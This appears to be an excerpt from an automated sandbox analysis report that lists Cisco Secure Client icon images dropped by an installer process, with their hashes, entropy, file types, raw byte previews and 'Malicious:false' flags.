                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..]le...V...>H.mE .1.[.0#Q.6.%=..l.....ln.sC.8H#.........F..W5.-."vq1..`.:.b4..$H'-.]3.n.d.i..A.].....G..6.^{}..{=?ic...^{.w....?.cV..;B.........4[..n....r....boo..9c.9..<.(g...].{..]O....OY.b.cqq./x..9u.Uk'...R:...'.....=.G'''...t.....>..4...'...h...."...K..../7z.MOF....'....#...>.|...S.j...3g&...~..1.:.:WB.uWJ..R.dT...'!K..rF.&E...^.......Z.........A...E..........`N...s.b. Wx..)[....o'B....}.E+c6..!.._.+Z.......R.B..G..8..D....._..N.....lle........./'#....W..]...........`0......?.^....t.......g?....j..*..C......KE]..z...P..W.k....PWF..aUT=O*.+.7.]...QA..uz.c.D.IOF..w..hx.E.{pp...1Y..-`{ELN..}....7.0...._..Q.6z....MN...Y../..+...'B.W.s.:?....[.NDBr2._..;;..U(..!......I.7.....k..W_.R..j...'...A.......e.o.\.tkm._...S,....'.....].>....dL.z.\.ml...15u.....6^.6w.:.:.U..e.....A;.)...f,,,.z....{Oi9"....$.V.p....h...L.7.u.d.%...1..o..x..J...N5..;...Z...y.I..hj..&."q.O..2..-1.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\status_ico_neutral.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):31702
                                                                                                                                      Entropy (8bit):7.968827949628217
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                      MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                      SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                      SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                      SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx...l]...2j...J.H......vf2e..8....Tu.4j...p50E...P.8.+.k.. Z..%.F...#..5..SR'.B{....d:p.;.7P.Nf*........d.}..g.[k....#.....g.....%H...!..~.T.^...'&&..2>>./...A......e.EX....v....e...nb.....E..(}yO......O.ttt.:...8...%k...rW.....h$..^.L..<..5.V..{..7...,.#..r..x...$...$..H|!...A.^.4.$..Ht!t_. I.J....bXy!$E].$...(."..X.B<..c....i7...p!.....X.s.\..^...............~....>.6^..8;...D..>./.hs.Q..u1f..hii)...I......q.....8s..F...0..i+\x<...A..22lZ..&x....y%\.....7..b.iTH...z..1....G.$........1a.d..b..Kvh...V...*<"*1.lG..p..?.B....)q...q.'o..6mJ..G.y.....=.....1...R.8.....3..7.tc..l...../....L...Fs?&Q....G?J}PI~.v!.......Cm..P.;....T..=....%.....*...^.s...~x.~....}.5.\...o..}]..s.....2......?...-?....tDW(.b.K.X.o.........;.w...w.........\..0.o..N.......^...7..........d..].........{....+..o...... '...).....]..n.G...+....Q...IvB.......x..y...^..3.sm..I...Hb.]g..-.g ..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\status_ico_noncompliant.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26026
                                                                                                                                      Entropy (8bit):7.927985837095832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                      MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                      SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                      SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                      SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._l.G....ZF.0..4...R...z.G..i/z.6.,...eE.!..s.(...0.E...{0.~.........$.2f...^J.....7.-.1nR'....\K...0.2..Ak.._*....Y..""#"...&U&..."...._*...-.....e..n..7.....m.Di.O...o`{[......y..6.>1..P.....D.'..z]..Q.2.u..^lll.. /...E..h..2..j.j..j|.c.......X&.h.".N..k%...c...L.........e.....j6...[....D....9^"....K..}}}.Dt2..g<..'B.I.....[q....d.:..OB.4'%..I{7.y"..~... q.?iLw..q.[..+...y".8.q.Z%}}}.D....{<.3'"...i6.|.I|..NF.eo....D.t;!..G.....s.DP.c.+=v.'......'B....x.+..A....M...3..O..-@...;.J...U!.t.D.itexw"..G?....gE.;.^...4.C...E.I6.I..U!.gLCC....kT.....'E...;j.V..E..f$........+.*."$.n.n"..!.S..."...$y..F.....+.afff...}rHZ`3$.d.Xs4%.'c..g@0;;K.D..w......pee....7...z.2FGGc.''.T.>l....^g>...............R...ty/...o.....,...~.m9p....r.3.~...1......$1....Y...X.-:.HJ..v...N.C........pR...YL...............6.t......)O...sQ.._.g..y..I.....z.w..X..b{..t.2.\/n.n.d'..k...6...F.|.|...].-.N..N..q..".......l..%

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\status_ico_transition.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5803
                                                                                                                                      Entropy (8bit):7.950077949239442
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                      MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                      SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                      SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                      SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............>a.....pHYs...........~....]IDATx..]{l[.y..."-?r...:.e'K..).9.R...%h.......0..m.?.y[.a. ...x.C.6t.......N.u3.......FJ.d..Dt.%.._.%>..;<7.)..;..R...@K...=.|..}.|..h..6.h.....U2.(......c.g...<..c.1@L..[....D"....F.4..3..MM.h.N.....9-..U..e.... .."...Ad.....>*'..lF......d.0.8....4E+..O..i.V<.....5==m5.x..w.......8^.b<JD.H.....&''.Fp'./....>.6.z...MO....T*.2D....}E.e...6. .I.z....fffZ..u.>...DL.1....acW.0.2....U.{.........W.c..!%W0W=. .......U.*0F.U...e....B..b.......c.Z...JW.\.... D.#.....h4.H...W.5F.w..;'~..o."...%..l.....|.#.w.......~"....H.^V.f2.f.x<.7GGGk..u."....?...1....}.3.......d2..L.|C...k...>.wo9.b/.p.r.. k....r`.2).m.u.8.*3$.I.....$=..@3. a.f<.J...A...E./$.8.4MY....u.Sh.#.1..,A..?.BR2.g....h4.......2......S4.2..S&....!.....B.J........d..........n.}w.0..]...t.5.x............Z.s_B.Y....f...?..A!..!.&#.&...|C!GV>K..z.jh.U_..x..n2@.4............0J../...Y.sD..I7.7F.........kKD..@l....">.. .g..K|..|./.1...&@.A.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\status_ico_trusted.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29723
                                                                                                                                      Entropy (8bit):7.971507308971378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                      MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                      SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                      SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                      SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._h].....Er..uQh..T2...E#.0m.....d...i/2.%2..L....N....L;.....%>..g.-.!...ER!&.j9..y..2.u.....x ..w.Y;.^{......~@..K{....~......,.!6....._.>(../........../~....FO.!....d.a.9thp..^.'t=...4>d.%....x.=....Z;.e.....=.^...6'....;88....o..k?....{.....ir2j..&'..:'fqqQ\.x...{2*..~./^..z.....5q..J.....!.~..q..N..0..+....z2...'!K..rH.&ET..^......4vY.;[.......b.q+d.].te,//.s".<.{.....\.+.le.^......+$.u....PO..v|./.he....O.J.......=H.....7cy..q......Y.k]......N......g#.I....M..?.........."{.dO...^.k..U....NH.qg....X..#.5|..E....7r..}.NF..4..J...w~.._....E.".Qu.:.E...{..l...U(..D..P...d..K.z.h..%/^.w\;.N..d...|.Q...X....2=.......W.......eR.X..~....;.Uo.w.....3....#.....7'.....q......f...D$$'ck..'P.G.y..v..!......A..T....*..w...F.U...OF].............V....*..biU$4>.U..y..OvB%=.S....B..b.DLM....WyQl..:c.a.D..o.6.\&kkk^.....Pm....=....kZ...~.*.u2.Qjr....lL..q...km.b|......>...E

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\sync.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1264
                                                                                                                                      Entropy (8bit):7.787798189239225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                      MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                      SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                      SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                      SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...C...@.....A^......pHYs...#...#.x.?v....IDATx..\;R.A.m0.3...8.*C...o.@'.D.%N.:."..q..*o,...@........~.Z-.....J.*}fGo..t..h.jB.D]"b.#"zCD..+.D..,.,...X).q.......:.."...}#.Y:X.........!.1":...1w.`9.=p02.$bw..VP....C..M...F..`.\....w /2.$..5.bQ.^.C[.X.t.\.N..8....[XCQ...Q&.<~...'\C..s.j%.d@ ..8..y.0.9#....0-......q...]..1../....).t.<....L.V....@)N..HQ..+B....9W|d.K..^8..W2-!.}...... Z...e..jB.).9S..Uc.PsF...r...n.+.....:2n..".....!l....E.%'.I.......!$.."._....*....H...?.....HD......7F.u.+...Ke.+.S2`.C...M.........2F2.p.q...ZU\$..E.UX....p..4M..f.Pb...2..k..J..,.D....e.E....i..zc@...tX...s.t....>4"CM...47}....p...\..x#.(....96.yd...._.@.6...C7..2.P....QD...3...7z..d`...3..]...+.b.`k..5....I.#K.V.%.F.h6`. f...g.....G..l....~"l..17.{. m.......1S..$z@.....4....5.........ks.E....._....52L.T.....m..`..;.r....&..p-...}.s.l.S....d%.q..[2...a.. ..|..4.1...v.....j.|b..d0\.....{..6.E.*22.S"..JHa.U.\f.. c.m..!t.HH.MS.sU.P&.Y.!_2.^..V..(S..=

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_amp_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):14308
                                                                                                                                      Entropy (8bit):7.981829207860698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                      MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                      SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                      SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                      SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....{.......!.}V...U.`...Z..X.....j.j.\*!.V..P..........OM.AhQ.l.[5... .\ ,.{~s..g.=g..v....'..ef..w._J.bn.)(.-$.m....l.....[k..47..G..v....W.5...5.Wz.....'.._6@.$@....>....].g.....=..G......V$;.'..........._6 .$@..WY.U....)q;U+.V].[..qR..a..T.\O...Y....u.v).q.-..d+..]...._s<.X..sJc.TO..v.G.og....Z>T...'.`.[.x;....l....>...e.:.x...|.n.d.=....2.aKt;.....}....W.B/<6%.D*......?q....I..:~..}a.d.`'a....+R.')8..|j.....W.s..w*.|.I.oy:....'aO...txa...w....M.)..!q.S.>g1..+V.{.wL..eO.x.......a...k#.[....^....b.D4.z.....X;..e.d..O.a.D...%...+H....u^.{..vm.....c5.Kl..+.V.....&.n]:KO......l;...Q../.r*.U..........6n.....p.^...4.......1..].i..C..%O.q.W5.4....;..h..].I.B.(....-.ex..:.l.....i.N..qp..=...I_..8.E.I.j...R/.i.1..x.............?.&o......W.57.5..t...E..%D.<..@3N"*..b%8Q.1..1....V.B..8Q.o.....).<...1.T.x.L...h...KdOc..V3..E...Z'9(.<.U'.D.....MY........4...}...R.rL........g

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_amp_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13810
                                                                                                                                      Entropy (8bit):7.9753795366170355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                      MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                      SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                      SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                      SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....B.R .w4..-.p-b..o".....`U.R+.+..=..<....J.b...."..U...ATD.....R....G. ..Nf.k.^k..k.%........3..o}..T...y........Pkt......r..wj_.~z...^....l|2....L._...>.I.../..^...N.6.$...:Q.N.iK.........V...X%N&.[Q.-c'....W.p,~U..-...S.....N.z~.w. .....;..<..>.?..._oK....w......3..[U[.....o.?..U.>.[...lR...D...u.w.../n.Y...{.x8O...M,......;.d<..1.._7).D&`.....N..3jx.g.S.[....N.n#..^?H...x.'.^}.i......_H.....I~1..;.S....;;.......x.w...............~@oly.;....F..]...i.?.P.6m..Q...#%.%...$<.p..W]...'.A....._uL;.o......_~.>........L..O.}..b....I.Gae.n....U..Y.6m.....+.-4.;.].............p...A..g.../...N..+(.$...n..S..&.....\z...]..y..v...?[...=.NZ.\.*...#.J***f.q`#..*H..W.45.V.{...G..<IT..'K.f*;Q.Vz.....u7.W";AT....1.-_.$.'d...-.<.c^o%::..L.%N<.+sLVc,.q.^'..i5&*/.6.....i*...Y.N......4$.!(...p1..6U..._.8....#{g.A..@.R.#..)........i............ ..F..S.......Qf.~..u..9......M..cN:.7F'..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_amp_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10811
                                                                                                                                      Entropy (8bit):7.9725003667897125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                      MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                      SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                      SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                      SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx............`....L)VT.U..Id.`*....jt.$.M...`m.........+.T4..8.....d3...^..R1.Q.K.5+. [.....sN..}.q.._...........$+.D..Rm.O..`./..=..?"........n..(.T.6.I.......sg|......K............x...p'.V.....6.........w..d..v...S.Yiu ..xf..*..!7."t.0........F.;u...3.y...........\...Yy..g...w...........=..J{.7..G.<..>..I."........Lwv..s..V..[.;.v0v...].....o............'..e....9=....?(........g~~O.@*..........|<.A..t..o.....f......K.z.'...}F*p.... ..9x.......U...e..m..;...R.@x..^...Mas.Y.=.?\..{.us.. .Z.o:..L..q.Q.>.?.........1ET..5.|....`.P...AF6_.R|.=.{......B......w..s..k.%3.....3R....3H....&._1.L8.,ydq;y.c....6..7B..+.8..l.'=HR...Y.!j..<...=.>.<.x .w..M..._,.x0....q.,.LB. ....6.yxh....\B._..\..E..k..}..o}....[.6/...0z1.......v.D.s3..L.LV..%.MJ$;P.v.\.=..L...J..$......./....H.....x^.m...l/-.....<.-,..e..cD...;>g....0..Z...n..@.0BZ.3..x......,.9..?}.....d.....H...#_.....S2QZ.._

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_nac_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13727
                                                                                                                                      Entropy (8bit):7.982847912604664
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                      MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                      SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                      SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                      SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..].t...7h....k..B..S......5Q.O.l..-D.....K....*j.X.T.....T.....66..D,X.B..J..@...}...3.s...{.|k...?3sf.>..oJ..^..-(.BDk..o.<........... =......"......\..{.....q..-(N.T...UZ.y.'p"..=Y.Ip.....K.^.:Q........E.wp..+.$..3..*]...0.J.....)_......*x...\M...1..$:.{B....0..e..]0..Z.Y.]...D'...k...p~....3D_.O,;..O..../5....#h..?./?8..[....7..#.....f.4*?e..}..j|e.......'.....d.N...b./...D...p...h]._S>9D.~..M.M.....M.|.@.-.Rr.$..k6.....2..7..v.L.?.Vb=...tl(...1x.._.....fJ$.C.......go...6.c....m.^.N.L&.....}/.j.})_......[.\...k5.....{EK...."......m...G.:.D...\w.q;.p.*%`.}..g.x.D/.c............HE%".d..?..'...DB.......U...<....k....y..N...8...f=..5. ....qO.[P.GD;.h......y...b..... .TT..}..:....M.l....w.wG.h.3....S........O..M...;.wF.p..xCt..T.I.2y)v.Ip6....`....H..V...mi...?a.F.Z2.(%....S...y.W..A.$.}N..(.....m.I..7e.....dr..=..n.7.-....I........L..5y........->1.".R.x.......n.^...Go.9~.!.-....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_nac_error.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13633
                                                                                                                                      Entropy (8bit):7.975971786407776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                      MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                      SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                      SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                      SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..}.t....*...KT .J.(..U".T.`.*.+.U.D...`.....G....V[.&.....m.*JX7...A.>..G....^4....8..g....=..I.[...9gf.|...c......+\.>..8^E.M=..O....w|.U......'..5G.A...].......h.......7'.....3=9.Uk.Hi..9Q.9o.E.^..F.^.......+I.......8W.E....w..~...&..?.............7..-..FAO.S.......>.A..:.....d.Z.(.=.{Qy!.Fz....q.N.p..+.....\DFp.c...x.y.....u.7.&................kg..{.g.../...EL .......E..-...#.#.....f$g.v"........Igup..E.,b:f..Lv..#/&..oM.l..G..z^Q.<...f.^]{.[.g...q.X...._.....s.d..(0"..<...V.8q....CM..N....yb...{.i....d....Q....c...{.z...x..D.Mi....<'...#c....G..F.......CM).9.*'...n...Y...zz..q..l.;.j.w...!.F..'&........!z\s._.j..u.Q...].k+...(...R'.H..B....(x.R'.H...-.N.8....|_...!.Ks.>9.yf.^@..P.O..../..^..#.j/.......w....c?op.C2q..:...$#=A.n]..i..y.'....tR.D...5...T.DO.#..U...}"|\..S.qH... .H[..<..]..V...u(.0O:2.X. .....>.S\.?.$...Ez.....$..<.. .=..paR.|...8..T....]......./...IY.......O

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_nac_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10710
                                                                                                                                      Entropy (8bit):7.9641316394298025
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                      MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                      SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                      SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                      SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx..]{..U._<..Th.CK=..R..V.GOWH.G3"8.5L.....;b............3.:S....s=....G].vX.w....W....Z?.^{..k..{.........w}...%y`...]...B6..........K.S..j.G."..?>.c..~../(/&}................p..B~..7...t.\... .j......,.......;.]M......`.o.p..?...98.c.%.6.....g...&.............;..F..!.fL%/.j@:.`.o....5_.b2...5|h...UoI/....W..W...}.....<.<\0.p.N.,Y......M...KI.O"C.x.}$.....=.V...E.........HT....Ep.m.~.[(....Y.f.'g*_...NG..S....m.2.<..[.(G.m..[.1....S........|...[.o.#eW....F.-.a.+...^.Rp...L.ue.<+./.......?..Lke.b.r.....V..G...$..6.]:.s...+..F...#O....=Y.;..g..l..,c....DWw.hB....B..l...`..;".wV.#..{.q.........v.].Z..C...T.`.-}M#...........{.(t.E.Om. ..=My..V...4.\.Ep.........W.)..x.W..f..7{.IG..-.....Z..{.l..F.,..f^r...V.9..H../.....$.&>..U...Msx.68.....S{...Z....v..v....O,.ps2E.......>..M_.........6H.hl.;Q.d....h.H...V..W...iH..{..2Q.zmp..;.Z~].c.!.Y.}.6.P......^kC..t...V.0.^.l.NMp..o..Y.8...Q

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\toast_nam_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12252
                                                                                                                                      Entropy (8bit):7.977665916091742
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                      MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                      SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                      SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                      SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                      Malicious:false
